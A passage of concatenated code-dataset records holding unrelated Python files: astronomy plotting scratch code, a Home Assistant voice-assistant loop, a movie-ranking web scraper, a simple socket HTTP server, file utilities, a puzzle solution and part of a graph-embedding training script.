grouped_by_dg['sum_abs_differences'])\n axs.set_ylim([0, 1.25])\n axs.set_xticks(grouped_by_dg.index.values)\n axs.legend([frob, sumdif], ['frobenius distance', 'sum of absolute differences', ])\n axs.set_title('R closeness to 2I vs. calibration shear magnitude')\n axs.set_xlabel('calibration shear magnitude')\n plt.savefig('plots/closeness_dg.png')\n plt.show()\n\n\ndef r_vs_reconv_profile(dataframe):\n\n # \"PSF reconvolution profile does not matter\"\n grouped_by_reconv_type = dataframe.groupby('reconv_psf_type').mean()\n print(grouped_by_reconv_type) # gives some weird values that shouldn't be there. Gaussian has non Nan value in grouped_by table for reconv_psf parameters #TODO why??\n # grouped_by_reconv_type.to_csv('table2.csv')\n\n\n fig, axs = plt.subplots(1, 1)\n x = np.asarray([0.2, 1.0])\n frob = axs.bar(x, grouped_by_reconv_type['frobenius_norm'], width=0.2)\n sumdif = axs.bar(x + 0.2, grouped_by_reconv_type['sum_abs_differences'], width=0.2)\n axs.set_xticks([0.3, 1.1])\n axs.set_xticklabels(['Gaussian', 'Moffat'])\n axs.legend([frob, sumdif], ['frobenius distance', 'sum of absolute differences'])\n axs.set_title('R closeness to 2I vs. reconvolution psf profile')\n axs.set_xlabel('reconvolution PSF profile')\n plt.savefig('plots/closeness_reconv_psf_type.png')\n plt.show()\n\n\ndef r_vs_gaussian_deconv_psf_size(dataframe):\n\n # Seeing the effect of deconvolution PSF size (Gaussian only) on R\n grouped_by_deconv_size_gaussian_mean = dataframe.groupby('deconv_psf_sigma').mean()\n grouped_by_deconv_size_gaussian_stdev = dataframe.groupby('deconv_psf_sigma').std()\n\n fig, axs = plt.subplots(1, 2, figsize=(16, 8))\n\n true_psf_sigma = 1.0 / 2.355\n sigmas = grouped_by_deconv_size_gaussian_mean.index.values\n dist_from_true = sigmas - true_psf_sigma * np.ones(len(sigmas))\n\n # frob = axs[0].plot(sigmas, grouped_by_deconv_size_gaussian_mean['frobenius_norm'], label='frobenius distance')\n # sumdif = axs[1].plot(sigmas, grouped_by_deconv_size_gaussian_mean['sum_abs_differences'], label='sum of absolute differences')\n frob_stdevs = axs[0].errorbar(sigmas, grouped_by_deconv_size_gaussian_mean['frobenius_norm'], yerr=grouped_by_deconv_size_gaussian_stdev['frobenius_norm'], capsize=5.0, label='frobenius distance')\n sumdif_stdevs = axs[1].errorbar(sigmas, grouped_by_deconv_size_gaussian_mean['sum_abs_differences'], yerr=grouped_by_deconv_size_gaussian_stdev['sum_abs_differences'], capsize=5.0, label='sum of absolute differences')\n\n for ax in axs:\n actual = ax.axvline(true_psf_sigma, 0, 1, color='r', label='true PSF sigma')\n ax.legend(loc=1)\n\n fig.suptitle('Closeness of R matrix to 2*I for Gaussian deconvolution PSFs of varying sizes')\n\n plt.savefig('plots/deconv_gaussian_sigma.png')\n plt.show()\n\n\ndef r_vs_gaussian_deconv_psf_size_violin(dataframe):\n\n # Violin plots for the same data\n gaussian_subframe = dataframe[dataframe['deconv_psf_type'] == 'Gaussian']\n gaussian_subframe = gaussian_subframe[dataframe['reconv_psf_type'] == 'Gaussian']\n sigma_distribution = gaussian_subframe[['deconv_psf_sigma', 'frobenius_norm', 'sum_abs_differences']]\n\n grouped = sigma_distribution.groupby(by='deconv_psf_sigma')\n values = []\n frob_dataset = []\n sumdif_dataset = []\n for name, group in grouped:\n print(name)\n values.append(name)\n frob_dataset.append(group['frobenius_norm'].to_numpy())\n sumdif_dataset.append(group['sum_abs_differences'].to_numpy())\n\n fig, axs = plt.subplots(1, 2, figsize = (16, 8))\n width = 0.1\n axs[0].violinplot(frob_dataset, positions=values, showmeans=True, widths=np.ones(len(values))*width)\n axs[1].violinplot(sumdif_dataset, positions = values, showmeans=True, widths=np.ones(len(values))*width)\n axs[0].set_title('Frobenius Distance')\n axs[1].set_title('Sum of element-wise absolute differences')\n\n true_psf_sigma = 1.0 / 2.355\n for ax in axs:\n actual = ax.axvline(true_psf_sigma, 0, 1, color='orange', label='true PSF sigma')\n ax.legend()\n ax.set_xlabel('Deconvolution PSF sigmas')\n\n fig.suptitle('Closeness of R to 2I for different deconvolution PSF sizes')\n\n version = 1\n if not os.path.exists('plots/violinplot.png'):\n plt.savefig('plots/violinplot.png')\n\n else:\n while os.path.exists('plots/violinplot' + '(' + str(version) + ').png'):\n version += 1\n\n plt.savefig('plots/violinplot' + '(' + str(version) + ').png')\n\n plt.show()\n\n\ndef sanity_check_1(dataframe):\n print(dataframe.columns)\n # print(dataframe['deconv_psf'])\n # print(dataframe['true_psf'])\n\n fig, axs = plt.subplots(2, 2, figsize=(12, 9))\n\n # fixing plotting scales\n diagmax = np.max([np.max(dataframe['R_11']), np.max(dataframe['R_22'])])\n print(diagmax)\n diagmin = np.min([np.min(dataframe['R_11']), np.min(dataframe['R_22'])])\n offdiagmax = np.max([np.max(dataframe['R_21']), np.max(dataframe['R_12'])])\n print(offdiagmax)\n offdiagmin = np.min([np.min(dataframe['R_21']), np.min(dataframe['R_12'])])\n\n scaling_factor = 1.01\n for i in range(2):\n for j in range(2):\n element_string = 'R_' + str(i + 1) + str(j + 1)\n axs[i][j].set_title(element_string)\n axs[i][j].plot(dataframe['true_psf_sigma'], dataframe[element_string])\n axs[i][j].tick_params(labelright=True)\n axs[i][j].set_xlabel('True PSF sigma)')\n\n if i == j:\n axs[i][j].set_ylim(top=2 + scaling_factor * (diagmax - 2), bottom=diagmin)\n else:\n axs[i][j].set_ylim(top=scaling_factor * offdiagmax, bottom=offdiagmin)\n\n fig.suptitle('Shear response matrix element values vs true PSF size')\n\n save_fig_to_plots('element_plot')\n\n plt.show()\n\n\n# generation function for early plot where I forgot to plot ratios\ndef sanity_check_1():\n # TODO change units to be in fwhm\n\n gal_flux = 1.e5\n gal_sigma = 2.\n gal = galsim.Gaussian(flux=gal_flux, sigma=gal_sigma)\n\n # initial shear\n dg1 = 0.00\n dg2 = 0.00\n\n # Original PSF size / galaxy size variations\n\n true_psf_vary_sigma = [galsim.Gaussian(flux=1., sigma=sig) for sig in 1 / 2.355 * np.arange(0.5, 1.3, 0.1)]\n\n observed_galaxy_variation = [metacal.generate_observed_galaxy(gal, psf, dg1, dg2) for psf in true_psf_vary_sigma]\n\n # Deconvolution PSF type and size variations\n deconv_Gaussian_size_variation = [galsim.Gaussian(flux=1., sigma=sig) for sig in\n 1 / 2.355 * np.arange(0.5, 1.3, 0.1)]\n\n # Reconvolution PSF type and size variations TODO Look up by how much the reconvolution PSF is dilated\n dilation_factor = 1.2\n reconv_Gaussian_size_variation = [galsim.Gaussian(flux=1., sigma=sig) for sig in\n 1 / 2.355 * dilation_factor * np.arange(0.5, 1.3, 0.1)]\n\n dg = [0.01] # same as Sheldon and Huff value\n\n # Creating long master list of all combinations to loop through\n combination_list = []\n for i in range(len(observed_galaxy_variation)):\n for delta_g in dg:\n combination_list.append((observed_galaxy_variation[i], true_psf_vary_sigma[i], deconv_Gaussian_size_variation[i], reconv_Gaussian_size_variation[i], delta_g, delta_g))\n\n return combination_list\n\n\n","repo_name":"sidneymau/shear-estimator-sensitivity","sub_path":"scripts/Metacalibration/scratchcode.py","file_name":"scratchcode.py","file_ext":"py","file_size_in_byte":11173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"33486534630","text":"\"\"\"The Ada Module.\"\"\"\nimport logging\n\nfrom .conversation import Conversation\nfrom .homeassistant import HomeAssistant\nfrom .hotword import Hotword\nfrom .microphone import Microphone\nfrom .options import Options\nfrom .speech import Speech\nfrom .voice import Voice\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass Ada:\n \"\"\"Hey Ada assistant.\"\"\"\n\n def __init__(self, options: Options):\n \"\"\"Initialize ada.\"\"\"\n self.homeassistant = HomeAssistant(options)\n self.hotword: Hotword = Hotword()\n self.speech: Speech = Speech(self.homeassistant)\n self.conversation: Conversation = Conversation(self.homeassistant)\n self.voice: Voice = Voice(self.homeassistant, options)\n self.microphone: Microphone = Microphone(\n self.hotword.frame_length, self.hotword.sample_rate\n )\n\n def run(self) -> None:\n \"\"\"Run Ada in a loop.\"\"\"\n self.microphone.start()\n try:\n self._run()\n finally:\n self.microphone.stop()\n\n def _run(self) -> None:\n \"\"\"Internal Runner.\"\"\"\n while True:\n pcm = self.microphone.get_frame()\n\n if not self.hotword.process(pcm):\n continue\n _LOGGER.info(\"Detect hotword\")\n\n # Start conversation\n wait_time = 2\n while True:\n text = self.speech.process(self.microphone, wait_time)\n if not text or text == \"Stop.\":\n break\n\n answer = self.conversation.process(text)\n if not answer:\n break\n\n if not self.voice.process(answer):\n break\n wait_time = 3\n","repo_name":"home-assistant/ada","sub_path":"ada/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"92"} +{"seq_id":"40312571036","text":"'''\n使用requests + bs4抓取猫眼电影top100排行榜电影信息\n保存数据到txt文件与json文件\n'''\n# 引入相关库\nimport requests\nfrom bs4 import BeautifulSoup\nimport random\nimport json\n\ndef get_agent():\n\tagents = [\n\t\t'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1',\n 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)'\n\t]\n\tagent = {}\n\tagent['User-Agent'] = random.choice(agents)\n\n\treturn agent\n\n# 获取页面内容\ndef get_html(url):\n\ttry:\n\t\tr = requests.get(url, headers=get_agent(), timeout=30)\n\t\tr.raise_for_status()\n\t\tr.encoding = 'utf-8'\n\t\treturn r.text\n\texcept:\n\t\treturn \"get html error\"\n\n# 解析页面内容\ndef parse_html(url, base_url):\n\thtml = get_html(url)\n\tsoup = BeautifulSoup(html, 'lxml')\n\tcomments = [] # 存放所有电影信息\n\tall_info = soup.find('dl', class_=\"board-wrapper\") # 确定所有电影信息存放位置\n\tdds = all_info.find_all('dd') # 获取所有电影内容\n\tfor dd in dds:\n\t\t# 存放每部电影信息\n\t\tcomment = {}\n\t\t# 电影排名\n\t\tcomment['index'] = dd.find('i', class_=\"board-index\").text\n\t\t# 电影标题\n\t\tcomment['title'] = dd.find('p', class_=\"name\").a.text\n\t\t# 主演\n\t\tcomment['actor'] = dd.find('p', class_=\"star\").text.strip()[3:]\n\t\t# 电影链接\n\t\tcomment['link'] = base_url + dd.find('p', class_=\"name\").a['href']\n\t\t# 上映时间\n\t\tcomment['time'] = dd.find('p', class_=\"releasetime\").text.strip()[5:]\n\t\t# 评分\n\t\tint_s = dd.find('i', class_=\"integer\").text\n\t\tfra_s = dd.find('i', class_=\"fraction\").text\n\t\tcomment['score'] = int_s + fra_s\n\t\t# 电影宣传图\n\t\tcomment['image'] = dd.find('img', class_=\"board-img\")['data-src']\n\n\t\tcomments.append(comment)\n\n\treturn comments\n\n# 保存文件\ndef save_file(result):\n\t# 保存到txt\n\twith open('mytop100.txt', 'a+', encoding='utf-8') as f:\n\t\tfor comment in result:\n\t\t\tf.write('排名: {}\\t标题: {}\\t主演: {}\\n链接: {}\\n上映时间: {}\\t评分: {}\\n宣传图: {}\\n\\n'.format(\n\t\t\t\tcomment['index'], comment['title'], comment['actor'], comment['link'], comment['time'],comment['score'],comment['image']))\n\n\t# 保存到json\n\twith open('mytop100.json', 'a+', encoding='utf-8') as f:\n\t\tf.write(json.dumps(result, ensure_ascii=False) + '\\n')\n\n\tprint(\"当前页面保存完成\")\n# 保存图片\ndef save_image(result):\n\tfor comment in result:\n\t\twith open('{}.jpg'.format(comment['title']), 'wb+') as f:\n\t\t\tf.write(requests.get(comment['image']).content)\n\n# 主程序执行过程\ndef main(page):\n\tbase_url = 'http://maoyan.com'\n\tmain_url = 'http://maoyan.com/board/4?offset='\n\turl_list = []\n\n\t# 保存所有页面\n\tfor i in range(page):\n\t\turl = main_url + str(i*10)\n\t\turl_list.append(url)\n\n\t# 解析每一个页面\n\tfor url in url_list:\n\t\tresult = parse_html(url, base_url)\n\t\tsave_file(result)\n\t\tsave_image(result)\n\n# 执行主程序\nif __name__ == '__main__':\n\toffset = 10\n\tmain(offset)","repo_name":"liuzhonghua0831/beautifulsoup","sub_path":"maoyan_top100.py","file_name":"maoyan_top100.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19308453943","text":"import socket\n\nHOST= '127.0.0.1'\n\nPORT = 8989\n\nmy_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nmy_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\nmy_socket.bind((HOST,PORT))\nmy_socket.listen(1)\n\nprint('Serving on port ',PORT)\n\nwhile True:\n clientconnection,address = my_socket.accept()\n request = clientconnection.recv(1024).decode('utf-8')\n # Split request from spaces\n string_list = request.split(' ') \n print(request)\n method = string_list[0]\n requested_file = string_list[1]\n\n print('Client request ', requested_file)\n\n filename = requested_file.split('?')[0] \n # get rid of the / to get the filename\n filename = filename.lstrip('/')\n \n try:\n file = open(filename,'rb') # read file in byte format\n response = file.read()\n file.close()\n\n header = 'HTTP/1.1 200 OK\\n'\n\n # determining the file type to render in the browser\n if(filename.endswith(\".jpg\")):\n mimetype = 'image/jpg'\n elif(filename.endswith(\".css\")):\n mimetype = 'text/css'\n elif(filename.endswith(\".mp4\")):\n mimetype = 'video/mp4'\n elif(filename.endswith(\".mp3\")):\n mimetype = 'audio/mp3'\n else:\n mimetype = 'text/html'\n\n header += 'Content-Type: '+str(mimetype)+'\\n\\n'\n\n except Exception as e:\n #when the file is not found by the server\n # display error message\n header = 'HTTP/1.1 404 Not Found\\n\\n'\n response = '

404 Not Found

'.encode('utf-8')\n\n final_response = header.encode('utf-8')\n final_response += response\n clientconnection.send(final_response)\n clientconnection.close()\n","repo_name":"Mehezabin/CSI-4118","sub_path":"A3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"37701926031","text":"import os\nimport pathlib\n\n\ndef find_files(root_directory, extensions: list[str], recursive: bool = False):\n available_files = (\n _find_files_recursively(root_directory, extensions=extensions)\n if recursive\n else [f for f in os.listdir() if _get_extension(f) in extensions]\n )\n\n return available_files\n\n\ndef _find_files_recursively(root_directory, extensions: list[str]):\n available_files = []\n for root, _, files in os.walk(root_directory):\n for filename in files:\n if _get_extension(filename) in extensions:\n available_files.append(os.path.join(root, filename))\n return available_files\n\n\ndef _get_extension(file_name):\n return pathlib.Path(file_name).suffix.lower()\n","repo_name":"tammohesselink/rekordbox-proof-audio-conversion","sub_path":"audio_conversion_tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"2861245267","text":"import numpy as np\n\nwith open(\"puzzle4.txt\") as file:\n nums = [int(x) for x in file.readline().split(',')]\n lines = [[int(x) for x in line.strip().split()] for index,line in enumerate(file.readlines()) if index % 6 != 0]\n\n boards = []\n for i in range(0, len(lines), 5):\n b = np.array(lines[i:i+5])\n boards.append(b)\n \n found = False\n done = False\n remaining = [x for x in range(len(boards))]\n for num in nums:\n # print(\"Calling number: \", num)\n for b in range(len(boards)):\n if b not in remaining: continue\n\n boards[b] = np.where(boards[b] == num, -1, boards[b])\n found = np.isin(-5, [boards[b].sum(0), boards[b].sum(1)])\n done = found and len(remaining) == 1\n if found:\n remaining.remove(b)\n if len(remaining) < 1: break\n if done: break\n \n print(boards[b])\n\n print(\"Lucky board:\", b)\n board = np.where(boards[b] < 0, 0, boards[b])\n sum = board.sum(0).sum(0).item(0)\n print(\"The sum is:\", sum)\n print(\"The number is:\", num)\n print(\"Total score: \", sum * num)\n \n\nimport numpy as np\nn, *b = open(0) # read input from stdin\nb = np.loadtxt(b, int).reshape(-1,5,5) # load boards into 3D array\n\nfor n in map(int, n.split(',')): # loop over drawn numbers\n b[b == n] = -1 # mark current number as -1\n m = (b == -1) # get all marked numbers\n win = (m.all(1) | m.all(2)).any(1) # check for win condition\n if win.any():\n print((b * ~m)[win].sum() * n) # print winning score\n b = b[~win] # remove winning board","repo_name":"itsPeetah/aoc-2021","sub_path":"previous/puzzle4_2.py","file_name":"puzzle4_2.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32873712372","text":"import unittest\n\nfrom indigo.models import initialise\nfrom indigo.util import (\n split,\n)\nfrom indigo.models import (\n Collection,\n Resource,\n)\n\n\nclass IndigoTestCase(unittest.TestCase):\n\n\n def setUp(self):\n initialise()\n\n\n def create_collection(self, path):\n container, name = split(path)\n Collection.create(name, container)\n\n\n def create_resource(self, path):\n container, name = split(path)\n Collection.create(name, container)\n\n\n def delete_collection(self, path):\n Collection.delete_all(path)\n\n\n","repo_name":"Indigo-Uliv/indigo","sub_path":"tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"1293612711","text":"#!/usr/bin/env python3\n\nimport networkx as nx\nimport math\nimport tensorflow as tf\nimport os\nimport sys\nimport shutil\nimport csv\nimport numpy as np\nfrom utils.eval_utils import _start_shell\nfrom random import shuffle\nimport pickle\nimport argparse\nimport subprocess\nimport progressbar\nfrom datetime import datetime\nimport glob\nfrom models.embedding_network import EmbeddingNetwork\nimport scipy\n\n\ndef normalize_data(samples):\n attr_names = {\n 'num_calls': [],\n 'num_transfer': [],\n 'num_arithmetic': [],\n 'num_instructions': [],\n 'betweenness_centrality': [],\n 'num_offspring': [],\n 'num_string': [],\n 'num_numeric_constant': []}\n\n for attr_name in attr_names:\n for pair in samples:\n for i in range(2):\n graph = pair[i]['graph']\n for node_id in graph.nodes:\n attr_names[attr_name].append(graph.nodes[node_id][attr_name])\n attr_avg_std_map = {}\n for attr_name in attr_names:\n attr_avg_std_map[attr_name] = {}\n attr_avg_std_map[attr_name]['avg'] = np.average(attr_names[attr_name])\n attr_avg_std_map[attr_name]['std'] = np.std(attr_names[attr_name])\n if attr_avg_std_map[attr_name]['std'] == 0:\n attr_avg_std_map[attr_name]['std'] = 1\n\n return attr_avg_std_map\n\n\ndef n_hot(max_node_num, ids):\n v = np.zeros(max_node_num)\n if ids is not None:\n np.put(v, ids, 1)\n return v\n\n\ndef get_graph_info_mat(graph, attr_avg_std_map, max_node_num, attributes_dim, emb_size):\n graph = graph['graph']\n neighbors = []\n attributes = []\n\n undir_graph = graph.to_undirected()\n undir_graph = nx.relabel.convert_node_labels_to_integers(undir_graph, first_label=0)\n\n if max_node_num < len(undir_graph):\n raise ValueError('Number of nodes in graph \"{}\" is larger than MaxNodeNum: {} >= MaxNodeNum'.format(undir_graph, len(undir_graph)))\n\n attr_names = ['num_calls', 'num_transfer', 'num_arithmetic', 'num_instructions', 'betweenness_centrality', 'num_offspring', 'num_string', 'num_numeric_constant']\n for idx in range(max_node_num):\n node_id = idx\n if node_id in undir_graph.nodes:\n neighbor_ids = list(undir_graph.neighbors(node_id))\n neighbors.append(n_hot(max_node_num, neighbor_ids))\n attrs = []\n for attr_name in attr_names:\n attrs.append((undir_graph.nodes[node_id][attr_name] - attr_avg_std_map[attr_name]['avg']) / attr_avg_std_map[attr_name]['std'])\n attributes.append(attrs)\n else:\n neighbors.append(n_hot(max_node_num, None))\n attributes.append(np.zeros(attributes_dim))\n return neighbors, attributes, np.zeros((max_node_num, emb_size))\n\n\ndef write_debug_mats(sess, ops, feed_dict, root_dir, sample_pair, information):\n if not os.path.isdir(root_dir):\n raise ValueError('Argument root_dir should be a valid folder.')\n\n W1, W2, P_n = sess.run([ops['W1'], ops['W2'], ops['P_n']])\n u_left, W1_mul_X_left, sigma_output_left = sess.run([ops['u_left'], ops['W1_mul_X_left'], ops['sigma_output_left']], feed_dict)\n u_right, W1_mul_X_right, sigma_output_right = sess.run([ops['u_right'], ops['W1_mul_X_right'], ops['sigma_output_right']], feed_dict)\n\n target_dir = os.path.join(root_dir, information)\n if not os.path.isdir(target_dir):\n os.mkdir(target_dir)\n\n left_dot_path = os.path.join(target_dir, sample_pair[0]['identifier'] + '.dot')\n right_dot_path = os.path.join(target_dir, sample_pair[1]['identifier'] + '.dot')\n nx.drawing.nx_pydot.write_dot(sample_pair[0]['graph'], left_dot_path)\n nx.drawing.nx_pydot.write_dot(sample_pair[1]['graph'], right_dot_path)\n subprocess.check_call(['dot', '-Tpng', '-O', left_dot_path])\n subprocess.check_call(['dot', '-Tpng', '-O', right_dot_path])\n np.savetxt(os.path.join(target_dir, 'W1.csv'), W1, delimiter=',')\n np.savetxt(os.path.join(target_dir, 'W2.csv'), W2, delimiter=',')\n np.savetxt(os.path.join(target_dir, 'u_left.csv'), u_left[0], delimiter=',')\n np.savetxt(os.path.join(target_dir, 'u_right.csv'), u_right[0], delimiter=',')\n np.savetxt(os.path.join(target_dir, 'W1_X_left.csv'), W1_mul_X_left[0], delimiter=',')\n np.savetxt(os.path.join(target_dir, 'W1_X_right.csv'), W1_mul_X_right[0], delimiter=',')\n np.savetxt(os.path.join(target_dir, 'sigma_out_left.csv'), sigma_output_left[0], delimiter=',')\n np.savetxt(os.path.join(target_dir, 'sigma_out_right.csv'), sigma_output_right[0], delimiter=',')\n for i in range(len(P_n)):\n np.savetxt(os.path.join(target_dir, 'P_{}.csv'.format(i)), P_n[i], delimiter=',')\n return\n\n\ndef ask_to_clean_dir(dir_path):\n if len(os.listdir(dir_path)) != 0:\n choice = input('Do you want to delete all the files in the {}? (y/n)'.format(dir_path)).lower()\n if choice == 'y' or choice == 'yes':\n shutil.rmtree(dir_path)\n os.mkdir(dir_path)\n return True\n else:\n print('{} is not empty, it is impossible to update the data inside this folder.'.format(dir_path))\n return False\n return True\n\n\ndef find_tfrecord_for(data_type, search_root):\n return glob.glob('{}/{}*.tfrecord'.format(search_root, data_type))\n\n\ndef parse_example_function(example_proto):\n features = {\n \"label\": tf.FixedLenFeature((), dtype=tf.int64),\n \"neighbors_shape\": tf.FixedLenFeature((2), dtype=tf.int64),\n \"attributes_shape\": tf.FixedLenFeature((2), dtype=tf.int64),\n \"u_init_shape\": tf.FixedLenFeature((2), dtype=tf.int64),\n \"identifier_left\": tf.FixedLenFeature((), dtype=tf.string),\n \"identifier_right\": tf.FixedLenFeature((), dtype=tf.string),\n \"neighbors_l\": tf.VarLenFeature(dtype=tf.float32),\n \"neighbors_r\": tf.VarLenFeature(dtype=tf.float32),\n \"attributes_l\": tf.VarLenFeature(dtype=tf.float32),\n \"attributes_r\": tf.VarLenFeature(dtype=tf.float32),\n \"u_init_l\": tf.VarLenFeature(dtype=tf.float32),\n \"u_init_r\": tf.VarLenFeature(dtype=tf.float32),\n }\n parsed_features = tf.parse_single_example(example_proto, features)\n for feature_name in parsed_features:\n if feature_name in ['label', 'neighbors_shape', 'attributes_shape', 'u_init_shape', 'identifier_left', 'identifier_right']:\n continue\n feature_type = feature_name.rstrip('_r').rstrip('_l')\n parsed_features[feature_name] = tf.sparse_tensor_to_dense(parsed_features[feature_name])\n parsed_features[feature_name] = tf.reshape(parsed_features[feature_name], parsed_features[feature_type + '_shape'])\n return parsed_features[\"neighbors_l\"], parsed_features[\"neighbors_r\"], parsed_features[\"attributes_l\"], parsed_features[\"attributes_r\"], parsed_features[\"u_init_l\"], parsed_features[\"u_init_r\"], parsed_features[\"label\"], parsed_features[\"identifier_left\"], parsed_features[\"identifier_right\"]\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(description='Train the graph embedding network for function flow graph.')\n parser.add_argument('TrainingDataDir', help='The path to the directory contains training data.')\n parser.add_argument('MODEL_DIR', help='The folder to save the model.')\n parser.add_argument('LOG_DIR', help='The folder to save the model log.')\n parser.add_argument('--LoadModel', dest='LoadModel', help='Load old model in MODEL_DIR.', action='store_true')\n parser.add_argument('--no-LoadModel', dest='LoadModel', help='Do not load old model in MODEL_DIR.', action='store_false')\n parser.set_defaults(LoadModel=False)\n parser.add_argument('--StartIPython', dest='StartIPython', help='Start IPython shell.', action='store_true')\n parser.add_argument('--no-StartIPython', dest='StartIPython', help='Do not start IPython shell.', action='store_false')\n parser.set_defaults(StartIPython=False)\n parser.add_argument('--UpdateModel', dest='UpdateModel', help='Update the model.', action='store_true')\n parser.add_argument('--no-UpdateModel', dest='UpdateModel', help='Do not update the model.', action='store_false')\n parser.set_defaults(UpdateModel=False)\n parser.add_argument('--GPU_ID', type=int, default=0, help='The GPU ID of the GPU card.')\n parser.add_argument('--BatchSize', type=int, default=32, help='Number of step per-epoch.')\n parser.add_argument('--LearningRate', type=float, default=0.0001, help='The learning rate for the model.')\n parser.add_argument('--T', type=int, default=5, help='The T parameter in the model.(How many hops to propagate information to.)')\n parser.add_argument('--AttrDims', type=int, default=8, help='The dimensions of the attributes.')\n parser.add_argument('--MaxNodeNum', type=int, default=200, help='The max number of nodes per ACFG.')\n parser.add_argument('--Epochs', type=int, default=1000, help='The number of epochs to run.')\n parser.add_argument('--NumberOfRelu', type=int, default=2, help='The number of relu layer in the sigma function.')\n parser.add_argument('--EmbeddingSize', type=int, default=64, help='The dimension of the embedding vectors.')\n parser.add_argument('--MaxNumModelToKeep', type=int, default=100, help='The number of model to keep in the saver directory.')\n parser.add_argument('--DebugMatsDir', help='The dimension of the embedding vectors.')\n parser.add_argument('--Debug', dest='Debug', help='Debug mode on.', action='store_true')\n parser.add_argument('--no-Debug', dest='Debug', help='Debug mode off.', action='store_false')\n parser.set_defaults(Debug=False)\n parser.add_argument('--Inference', dest='Inference', help='Inference mode on.', action='store_true')\n parser.add_argument('--no-Inference', dest='Inference', help='Inference mode off.', action='store_false')\n parser.set_defaults(Inference=False)\n parser.add_argument('--TSNE_Mode', dest='TSNE_Mode', help='T-SNE mode on', action='store_true')\n parser.add_argument('--no-TSNE_Mode', dest='TSNE_Mode', help='T-SNE mode off', action='store_false')\n parser.set_defaults(TSNE_Mode=False)\n parser.add_argument('--ShuffleLearningData', dest='ShuffleLearningData', help='Learning data shuffle mode on', action='store_true')\n parser.add_argument('--no-ShuffleLearningData', dest='ShuffleLearningData', help='Learning data shuffle mode off', action='store_false')\n parser.set_defaults(ShuffleLearningData=False)\n parser.add_argument('--TSNE_InputData', help='Data to generate embedding and do T-SNE.')\n parser.add_argument('--TrainingPlk', help='Pickled data to calculate attr_avg_std_map.')\n parser.add_argument('--TF_LOG_LEVEL', default=3, type=int, help='Environment variable to TF_CPP_MIN_LOG_LEVEL')\n args = parser.parse_args()\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\" # see issue #152\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.GPU_ID)\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(args.TF_LOG_LEVEL)\n\n attributes_dim = args.AttrDims\n\n if not os.path.isdir(args.MODEL_DIR):\n print('MODEL_DIR folder should be a valid folder.')\n sys.exit(-2)\n elif not args.LoadModel:\n if not ask_to_clean_dir(args.MODEL_DIR):\n sys.exit(-3)\n if not ask_to_clean_dir(args.LOG_DIR):\n sys.exit(-4)\n\n if args.Debug and not args.DebugMatsDir:\n print('DebugMatsDir should be set when Debug mode is on.')\n sys.exit(-6)\n\n with tf.device('/cpu:0'):\n shuffle_seed = tf.placeholder(tf.int64, shape=[])\n train_filenames = find_tfrecord_for('train', args.TrainingDataDir)\n dataset = tf.data.TFRecordDataset(train_filenames)\n dataset = dataset.map(parse_example_function, num_parallel_calls=8)\n dataset = dataset.shuffle(buffer_size=10000, seed=shuffle_seed).batch(args.BatchSize)\n dataset = dataset.prefetch(buffer_size=4000)\n iterator = dataset.make_initializable_iterator()\n next_element = iterator.get_next()\n\n test_filenames = find_tfrecord_for('test', args.TrainingDataDir)\n test_dataset = tf.data.TFRecordDataset(test_filenames)\n test_dataset = test_dataset.map(parse_example_function, num_parallel_calls=8)\n test_dataset = test_dataset.batch(args.BatchSize)\n test_iterator = test_dataset.make_initializable_iterator()\n test_next_element = test_iterator.get_next()\n\n print('Building model graph...... [{}]'.format(str(datetime.now())))\n with tf.device('/cpu:0'):\n global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)\n\n # Build Training Graph\n neighbors_left = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.MaxNodeNum), name='neighbors_left') # B x N x N\n attributes_left = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, attributes_dim), name='attribute_left') # B x N x d\n u_init_left = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.EmbeddingSize), name='u_init_left') # B x N x p\n\n neighbors_right = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.MaxNodeNum), name='neighbors_right') #B x N x N\n attributes_right = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, attributes_dim), name='attributes_right') # B x N x d\n u_init_right = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.EmbeddingSize), name='u_init_right') # B x N x p\n\n neighbors_test = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.MaxNodeNum), name='neighbors_test')\n attributes_test = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, attributes_dim), name='attributes_test')\n u_init_test = 